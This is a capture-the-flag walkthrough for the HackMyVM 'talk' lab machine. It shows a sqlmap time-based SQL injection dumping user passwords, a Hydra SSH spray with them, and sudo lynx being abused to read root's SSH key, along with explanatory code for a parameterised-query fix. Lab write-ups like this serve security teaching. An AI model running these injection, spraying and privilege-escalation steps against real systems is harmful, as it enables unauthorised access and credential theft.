HackMyVM: talk box detailed writeup (WP)
城南花已开 Lv5

Information gathering

Service probing

This is an easy box, and a very quick one.

A scan shows port 80 open; curl it and the HTML source looks like a chat room, where you can chat once logged in.

┌──(kali㉿kali)-[~/temp/talk]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:a1:14:59 PCS Systemtechnik GmbH
192.168.56.118 08:00:27:fe:ac:c1 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.972 seconds (129.82 hosts/sec). 3 responded
┌──(kali㉿kali)-[~/temp/talk]
└─$ nmap 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 07:03 EDT
Nmap scan report for 192.168.56.118
Host is up (0.0014s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
┌──(kali㉿kali)-[~/temp/talk]
└─$ curl 192.168.56.118
<!DOCTYPE html>
<html lang="en" >

<head>
<meta charset="UTF-8">
<title>chatME</title>

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">

<link rel='stylesheet prefetch' href='https://fonts.googleapis.com/css?family=Roboto:400,100,300,500,700,900|RobotoDraft:400,100,300,500,700,900'>
<link rel='stylesheet prefetch' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css'>

<link rel="stylesheet" href="css/style.css">


</head>

<body>


<!-- Form Mixin-->
<!-- Input Mixin-->
<!-- Button Mixin-->
<!-- Pen Title-->
<div class="pen-title">
<h1><!-- ChatME--></h1>
</div>
<!-- Form Module-->
<div class="module form-module">
<div class="toggle"><i class="fa fa-times fa-pencil"></i>
<div class="tooltip">Click Me</div>
</div>
<div class="form">
<h2>Login to your account</h2>
<form name="form_login" method="post" action="login.php">
<input type="text" placeholder="Username" name="username" />
<input type="password" placeholder="Password" name="password" />
<button>Login</button>
</form>
</div>
<div class="form">
<h2>Create an account</h2>
<form name="form_register" method="post" action="register.php">
<input type="text" placeholder="Your Name" name="your_name" required="required" />
<input type="text" placeholder="Username" name="username" required="required" />
<input type="password" placeholder="Password" name="password" required="required" />
<input type="email" placeholder="Email Address" name="email" />
<input type="phone" placeholder="Phone Number" name="phone" />
<button>Register</button>
</form>
</div>
<div class="cta"><!-- <a href="#">Forgot your password?</a> --><center>Developed by: PJCaraig &copy 2018</center></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src='https://codepen.io/andytran/pen/vLmRVp.js'></script>



<script src="js/index.js"></script>




</body>

</html>

SQL injection

Tried logging in as admin with the classic universal-password (tautology) payload, and it worked, so there is a SQL injection risk.

Just let sqlmap do the work: capture the login request with Burp Suite, save it to a file, and pass that file to sqlmap with the -l option.


┌──(kali㉿kali)-[~/temp/talk]
└─$ cat 1.txt
POST /login.php HTTP/1.1
Host: 192.168.56.118
Content-Length: 29
Cache-Control: max-age=0
Origin: http://192.168.56.118
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.118/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=5n6dlotn3tt231o73t9hcvftn4; _ga=GA1.1.1743286532.1727596627; _ga_6E1L856HPS=GS1.1.1727596626.1.1.1727596778.0.0.0
Connection: keep-alive

username=admin&password=admin

┌──(kali㉿kali)-[~/temp/talk]
└─$ sqlmap -l 1.txt --batch --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.3#dev}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:10:43 /2024-09-29/

[07:10:43] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.118:80/login.php
Cookie: PHPSESSID=5n6dlotn3tt231o73t9hcvftn4; _ga=GA1.1.1743286532.1727596627; _ga_6E1L856HPS=GS1.1.1727596626.1.1.1727596778.0.0.0
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[07:10:43] [INFO] testing URL 'http://192.168.56.118:80/login.php'
[07:10:43] [INFO] resuming back-end DBMS 'mysql'
[07:10:43] [INFO] using '/home/kali/.local/share/sqlmap/output/results-09292024_0710am.csv' as the CSV results file in multiple targets mode
[07:10:43] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'index.php?attempt=failed'. Do you want to apply it from now on? [Y/n] Y
[07:10:43] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 4123 FROM (SELECT(SLEEP(5)))EjVA) AND 'CgYV'='CgYV&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[07:10:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:10:43] [INFO] fetching database names
[07:10:43] [INFO] fetching number of databases
[07:10:43] [INFO] resumed: 4
[07:10:43] [INFO] resumed: information_schema
[07:10:43] [INFO] resumed: chat
[07:10:43] [INFO] resumed: mysql
[07:10:43] [INFO] resumed: performance_schema
available databases [4]:
[*] chat ##there is a "chat" database
[*] information_schema
[*] mysql
[*] performance_schema

[07:10:43] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/.local/share/sqlmap/output/results-09292024_0710am.csv'

[*] ending @ 07:10:43 /2024-09-29/##next, look at which tables this database has
┌──(kali㉿kali)-[~/temp/talk]
└─$ sqlmap -l 1.txt --batch --dbs -D chat --tables
___
__H__
___ ___[(]_____ ___ ___ {1.8.6.3#dev}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:13:54 /2024-09-29/

[07:13:54] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.118:80/login.php
Cookie: PHPSESSID=5n6dlotn3tt231o73t9hcvftn4; _ga=GA1.1.1743286532.1727596627; _ga_6E1L856HPS=GS1.1.1727596626.1.1.1727596778.0.0.0
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[07:13:55] [INFO] testing URL 'http://192.168.56.118:80/login.php'
[07:13:55] [INFO] resuming back-end DBMS 'mysql'
[07:13:55] [INFO] using '/home/kali/.local/share/sqlmap/output/results-09292024_0713am.csv' as the CSV results file in multiple targets mode
[07:13:55] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'index.php?attempt=failed'. Do you want to apply it from now on? [Y/n] Y
[07:13:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 4123 FROM (SELECT(SLEEP(5)))EjVA) AND 'CgYV'='CgYV&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[07:13:55] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:13:55] [INFO] fetching database names
[07:13:55] [INFO] fetching number of databases
[07:13:55] [INFO] resumed: 4
[07:13:55] [INFO] resumed: information_schema
[07:13:55] [INFO] resumed: chat
[07:13:55] [INFO] resumed: mysql
[07:13:55] [INFO] resumed: performance_schema
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema

[07:13:55] [INFO] fetching tables for database: 'chat'
[07:13:55] [INFO] fetching number of tables for database 'chat'
[07:13:55] [INFO] resumed: 3
[07:13:55] [INFO] resumed: user
[07:13:55] [INFO] resumed: chat
[07:13:55] [INFO] resumed: chat_room
Database: chat
[3 tables]
+-----------+
| user |##there is a "user" table
| chat |
| chat_room |
+-----------+

[07:13:55] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/.local/share/sqlmap/output/results-09292024_0713am.csv'

[*] ending @ 07:13:55 /2024-09-29/
┌──(kali㉿kali)-[~/temp/talk] ##the enumeration below is a bit slow because the injection is time-based blind
└─$ sqlmap -l 1.txt --batch --dbs -D chat -T user --dump
___
__H__
___ ___[,]_____ ___ ___ {1.8.6.3#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:15:54 /2024-09-29/

[07:15:54] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.118:80/login.php
Cookie: PHPSESSID=5n6dlotn3tt231o73t9hcvftn4; _ga=GA1.1.1743286532.1727596627; _ga_6E1L856HPS=GS1.1.1727596626.1.1.1727596778.0.0.0
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[07:15:54] [INFO] testing URL 'http://192.168.56.118:80/login.php'
[07:15:54] [INFO] resuming back-end DBMS 'mysql'
[07:15:54] [INFO] using '/home/kali/.local/share/sqlmap/output/results-09292024_0715am.csv' as the CSV results file in multiple targets mode
[07:15:54] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'index.php?attempt=failed'. Do you want to apply it from now on? [Y/n] Y
[07:15:54] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 4123 FROM (SELECT(SLEEP(5)))EjVA) AND 'CgYV'='CgYV&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[07:15:54] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:15:54] [INFO] fetching database names
[07:15:54] [INFO] fetching number of databases
[07:15:54] [INFO] resumed: 4
[07:15:54] [INFO] resumed: information_schema
[07:15:54] [INFO] resumed: chat
[07:15:54] [INFO] resumed: mysql
[07:15:54] [INFO] resumed: performance_schema
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema

[07:15:54] [INFO] fetching columns for table 'user' in database 'chat'
[07:15:54] [INFO] resumed: 6
[07:15:54] [INFO] resumed: userid
[07:15:54] [INFO] resumed: username
[07:15:54] [INFO] resumed: password
[07:15:54] [INFO] resumed: your_name
[07:15:54] [INFO] resumed: email
[07:15:54] [INFO] resumed: phone
[07:15:54] [INFO] fetching entries for table 'user' in database 'chat'
[07:15:54] [INFO] fetching number of entries for table 'user' in database 'chat'
[07:15:54] [INFO] resumed: 5
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: adrianthebest
[07:15:54] [INFO] resumed: 11
[07:15:54] [INFO] resumed: 5
[07:15:54] [INFO] resumed: david
[07:15:54] [INFO] resumed: david
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: thatsmynonapass
[07:15:54] [INFO] resumed: 111
[07:15:54] [INFO] resumed: 4
[07:15:54] [INFO] resumed: jerry
[07:15:54] [INFO] resumed: jerry
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: myfriendtom
[07:15:54] [INFO] resumed: 1111
[07:15:54] [INFO] resumed: 2
[07:15:54] [INFO] resumed: nona
[07:15:54] [INFO] resumed: nona
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: pao
[07:15:54] [INFO] resumed: 09123123123
[07:15:54] [INFO] resumed: 1
[07:15:54] [INFO] resumed: pao
[07:15:54] [INFO] resumed: PaoPao
[07:15:54] [INFO] resumed: [email protected]
[07:15:54] [INFO] resumed: davidwhatpass
[07:15:54] [INFO] resumed: 11111
[07:15:54] [INFO] resumed: 3
[07:15:54] [INFO] resumed: tina
[07:15:54] [INFO] resumed: tina
Database: chat
Table: user
[5 entries]
+--------+-----------------+-------------+-----------------+----------+-----------+
| userid | email | phone | password | username | your_name |
+--------+-----------------+-------------+-----------------+----------+-----------+
| 5 | [email protected] | 11 | adrianthebest | david | david |
| 4 | [email protected] | 111 | thatsmynonapass | jerry | jerry |
| 2 | [email protected] | 1111 | myfriendtom | nona | nona |
| 1 | [email protected] | 09123123123 | pao | pao | PaoPao |
| 3 | [email protected] | 11111 | davidwhatpass | tina | tina |
+--------+-----------------+-------------+-----------------+----------+-----------+

[07:15:54] [INFO] table 'chat.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.118/dump/chat/user.csv'
[07:15:54] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/.local/share/sqlmap/output/results-09292024_0715am.csv'

[*] ending @ 07:15:54 /2024-09-29/
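
Why the "universal password" login works, and what the fix looks like, as an added example that is not code from the writeup or from the chatME application: a constructed in-memory SQLite stand-in for the chat.user table (same six columns as the dump above; e-mail values are placeholders) with the string-spliced query beside the parameterised one.

```python
import sqlite3

# Constructed stand-in for the box's chat.user table, with the six columns the
# sqlmap dump shows. Rows are sample values taken from that dump; the e-mail
# addresses are placeholders because the page redacts them.
SAMPLE_USERS = [
    (1, "pao@example.invalid", "09123123123", "pao", "pao", "PaoPao"),
    (2, "nona@example.invalid", "1111", "myfriendtom", "nona", "nona"),
    (3, "tina@example.invalid", "11111", "davidwhatpass", "tina", "tina"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE user (userid INTEGER PRIMARY KEY, email TEXT, phone TEXT,"
        " password TEXT, username TEXT, your_name TEXT)"
    )
    db.executemany("INSERT INTO user VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return db


def login_vulnerable(db, username, password):
    """The login.php anti-pattern: form input spliced into the SQL text.

    The quotes closing each literal come from the attacker-controlled string,
    so a value shaped like  ' OR '1'='1  rewrites the WHERE clause instead of
    being compared with the column, and the first row matches regardless of
    the credentials supplied.
    """
    sql = (
        "SELECT username FROM user WHERE username='" + username
        + "' AND password='" + password + "' ORDER BY userid"
    )
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Same lookup with bound parameters: the driver passes the values
    separately from the statement, so quotes inside them are data, never
    SQL syntax."""
    row = db.execute(
        "SELECT username FROM user WHERE username=? AND password=? ORDER BY userid",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"  # the "universal password" shape, in both fields
    print("valid creds, vulnerable:", login_vulnerable(db, "nona", "myfriendtom"))
    print("valid creds, safe:      ", login_safe(db, "nona", "myfriendtom"))
    print("tautology, vulnerable:  ", login_vulnerable(db, tautology, tautology))
    print("tautology, safe:        ", login_safe(db, tautology, tautology))
```

Storing passwords in the clear, as chat.user does, is a second defect: the hardened lookup should fetch the row by username and compare a salted hash, rather than matching on the raw password column.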

The relevant sqlmap options are listed in the table below.

Target:
At least one of the following options must be provided to define the target

-u URL, --url=URL    Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-d DIRECT            Connection string for direct database connection
-l LOGFILE           Parse target(s) from a Burp or WebScarab proxy log file
-m BULKFILE          Scan multiple targets given in a text file
-r REQUESTFILE       Load an HTTP request from a file
-g GOOGLEDORK        Process Google dork results as target URLs
-c CONFIGFILE        Load options from a configuration INI file
Enumeration:
These options are used to enumerate the back-end DBMS information, structure and the data contained in its tables

-a, --all            Retrieve everything
-b, --banner         Retrieve the DBMS banner
--current-user       Retrieve the DBMS current user
--current-db         Retrieve the DBMS current database
--hostname           Retrieve the DBMS server hostname
--is-dba             Detect whether the DBMS current user is a DBA
--users              Enumerate DBMS users
--passwords          Enumerate DBMS user password hashes
--privileges         Enumerate DBMS user privileges
--roles              Enumerate DBMS user roles
--dbs                Enumerate DBMS databases
--tables             Enumerate DBMS database tables
--columns            Enumerate DBMS table columns
--schema             Enumerate the DBMS schema
--count              Retrieve the number of entries for table(s)
--dump               Dump DBMS table entries
--dump-all           Dump all DBMS database table entries
--search             Search column(s), table(s) and/or database name(s)
--comments           Check for DBMS comments during enumeration
--statements         Retrieve the SQL statements being run on the DBMS
-D DB                DBMS database to enumerate
-T TBL               DBMS table(s) to enumerate
-C COL               DBMS table column(s) to enumerate
-X EXCLUDE           DBMS identifier(s) not to enumerate
-U USER              DBMS user to enumerate
--exclude-sysdbs     Exclude DBMS system databases when enumerating tables
--pivot-column=P..   Pivot column name
--where=DUMPWHERE    Use a WHERE condition while dumping a table
--start=LIMITSTART   First table entry to dump
--stop=LIMITSTOP     Last table entry to dump
--first=FIRSTCHAR    First character of the query output to retrieve
--last=LASTCHAR      Last character of the query output to retrieve
--sql-query=SQLQ..   SQL statement to execute
--sql-shell          Prompt for an interactive SQL shell
--sql-file=SQLFILE   Execute SQL statements from the given file

Text processing

Now that we have usernames and passwords, do some text processing first: use awk (as in the commands below) to write the user column and the password column out separately.


┌──(kali㉿kali)-[~/temp/talk]
└─$ cat temp.txt|awk '{print $10}'>user.txt
┌──(kali㉿kali)-[~/temp/talk]
└─$ cat temp.txt|awk '{print $8}'>pass.txt
┌──(kali㉿kali)-[~/temp/talk]
└─$ vim user.txt ##clean up again: delete the leading "username" header and the trailing blank lines
┌──(kali㉿kali)-[~/temp/talk]
└─$ vim pass.txt ##delete the leading "password" header and the trailing blank lines
┌──(kali㉿kali)-[~/temp/talk]
└─$ hydra -L user.txt -P pass.txt ssh://192.168.56.118 -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-29 07:31:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.118:22/
[ATTEMPT] target 192.168.56.118 - login "david" - pass "adrianthebest" - 1 of 25 [child 0] (0/0)
[ATTEMPT] target 192.168.56.118 - login "david" - pass "thatsmynonapass" - 2 of 25 [child 1] (0/0)
[ATTEMPT] target 192.168.56.118 - login "david" - pass "myfriendtom" - 3 of 25 [child 2] (0/0)
[ATTEMPT] target 192.168.56.118 - login "david" - pass "pao" - 4 of 25 [child 3] (0/0)
[ATTEMPT] target 192.168.56.118 - login "david" - pass "davidwhatpass" - 5 of 25 [child 4] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "adrianthebest" - 6 of 25 [child 5] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "thatsmynonapass" - 7 of 25 [child 6] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "myfriendtom" - 8 of 25 [child 7] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "pao" - 9 of 25 [child 8] (0/0)
[ATTEMPT] target 192.168.56.118 - login "jerry" - pass "davidwhatpass" - 10 of 25 [child 9] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "adrianthebest" - 11 of 25 [child 10] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "thatsmynonapass" - 12 of 25 [child 11] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "myfriendtom" - 13 of 25 [child 12] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "pao" - 14 of 25 [child 13] (0/0)
[ATTEMPT] target 192.168.56.118 - login "nona" - pass "davidwhatpass" - 15 of 25 [child 14] (0/0)
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "adrianthebest" - 16 of 25 [child 15] (0/0)
[22][ssh] host: 192.168.56.118 login: david password: davidwhatpass ##found with no effort at all
[22][ssh] host: 192.168.56.118 login: nona password: thatsmynonapass ##this is the user that actually matters
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "thatsmynonapass" - 17 of 25 [child 4] (0/0)
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "myfriendtom" - 18 of 25 [child 11] (0/0)
[22][ssh] host: 192.168.56.118 login: jerry password: myfriendtom
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "pao" - 19 of 25 [child 7] (0/0)
[RE-ATTEMPT] target 192.168.56.118 - login "pao" - pass "myfriendtom" - 19 of 25 [child 11] (0/0)
[ATTEMPT] target 192.168.56.118 - login "pao" - pass "davidwhatpass" - 20 of 25 [child 1] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "adrianthebest" - 21 of 25 [child 2] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "thatsmynonapass" - 22 of 25 [child 0] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "myfriendtom" - 23 of 25 [child 3] (0/0)
[RE-ATTEMPT] target 192.168.56.118 - login "tina" - pass "myfriendtom" - 23 of 25 [child 3] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "pao" - 24 of 25 [child 14] (0/0)
[ATTEMPT] target 192.168.56.118 - login "tina" - pass "davidwhatpass" - 25 of 25 [child 13] (0/0)
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-29 07:31:12
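
The awk step above picks fields by position ($8 and $10) and then needs manual vim clean-up of the header and blank lines. As an added example (not from the writeup), here is a parser that reads the sqlmap table by its header names instead, on a constructed copy of the dump with the redacted e-mails replaced by placeholders.

```python
import os

# Constructed sample: the table as sqlmap prints it. Rows are from the page's
# chat.user dump; the e-mail addresses are placeholders (the page redacts them).
SQLMAP_DUMP = """\
Database: chat
Table: user
[5 entries]
+--------+--------------------+-------------+-----------------+----------+-----------+
| userid | email              | phone       | password        | username | your_name |
+--------+--------------------+-------------+-----------------+----------+-----------+
| 5      | david@example.test | 11          | adrianthebest   | david    | david     |
| 4      | jerry@example.test | 111         | thatsmynonapass | jerry    | jerry     |
| 2      | nona@example.test  | 1111        | myfriendtom     | nona     | nona      |
| 1      | pao@example.test   | 09123123123 | pao             | pao      | PaoPao    |
| 3      | tina@example.test  | 11111       | davidwhatpass   | tina     | tina      |
+--------+--------------------+-------------+-----------------+----------+-----------+
"""


def parse_sqlmap_table(text):
    """Return the table rows as dicts keyed by the header names.

    Only lines starting with '|' carry cells; the first such line is the
    header, so column order comes from sqlmap's own output rather than from
    hard-coded awk field positions. Border lines, 'Database:' / 'Table:' and
    '[N entries]' are skipped, which is what removed the stray blank lines.
    """
    header, rows = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if header is None:
            header = cells
        elif len(cells) == len(header):
            rows.append(dict(zip(header, cells)))
    return rows


def column(rows, name):
    """Values of one column in row order, e.g. column(rows, "username")."""
    return [r[name] for r in rows]


def write_wordlists(rows, out_dir="."):
    """Write user.txt and pass.txt, one value per line, without the header
    line or trailing blank lines the page had to remove by hand in vim."""
    paths = {}
    for fname, col in (("user.txt", "username"), ("pass.txt", "password")):
        path = os.path.join(out_dir, fname)
        with open(path, "w") as fh:
            fh.write("\n".join(column(rows, col)) + "\n")
        paths[col] = path
    return paths


if __name__ == "__main__":
    rows = parse_sqlmap_table(SQLMAP_DUMP)
    print(column(rows, "username"))
    print(column(rows, "password"))
```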
-R        Restore a previous aborted/crashed session and continue cracking.
-S        Connect via SSL.
-s PORT   Specify a non-default port with this option.
-l LOGIN  Specify a single login name to attack.
-L FILE   Specify a login-name wordlist.
-p PASS   Lowercase: specify a single password; rarely used, a password wordlist is the norm.
-P FILE   Uppercase: specify a password wordlist.
-e ns     Optional: n = try an empty password, s = try the login name as the password.
-C FILE   Colon-separated "login:password" file, used instead of -L/-P.
-M FILE   Target list file, one target per line.
-o FILE   Write results to this file.
-f        With -M: stop cracking once the first login/password pair is found.
-t TASKS  Number of parallel tasks, default 16.
-w TIME   Maximum wait time in seconds, default 30s.
-v / -V   Show verbose progress.
server    Target IP
service   Service name; supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp, and so on.
OPT       Optional arguments

Remember not to give Hydra the stop-after-first-success option, otherwise you only get the david user, who is not much use; the rest is easy from here.

Privilege escalation

┌──(kali㉿kali)-[~/temp/talk]
└─$ ssh nona@192.168.56.118
nona@192.168.56.118's password:
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Sep 12 04:41:29 2024 from 192.168.56.102
nona@talk:~$ cat user.txt
wordsarelies
nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nona may run the following commands on talk:
(ALL : ALL) NOPASSWD: /usr/bin/lynx
nona@talk:~$ sudo /usr/bin/lynx /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
##lynx is an open-source text-mode web browser that supports HTML and XHTML pages. It is mainly used to browse the web from the command line, has no graphical interface, and is fast, lightweight and efficient. It is widely used on Linux and other Unix-like systems and is a common command-line tool.
##Think of it as a browser; a browser can open local files too, so if you want to be quicker you can read /root/root.txt directly. I will still switch to the root user and read it from there.
┌──(kali㉿kali)-[~/temp/talk]
└─$ vim id_rsa
┌──(kali㉿kali)-[~/temp/talk]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/temp/talk]
└─$ ssh root@192.168.56.118 -i id_rsa
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Sep 12 05:17:40 2024 from 192.168.56.102
root@talk:~# cat root.txt
talktomeroot

Done; an easy box, finished quickly.
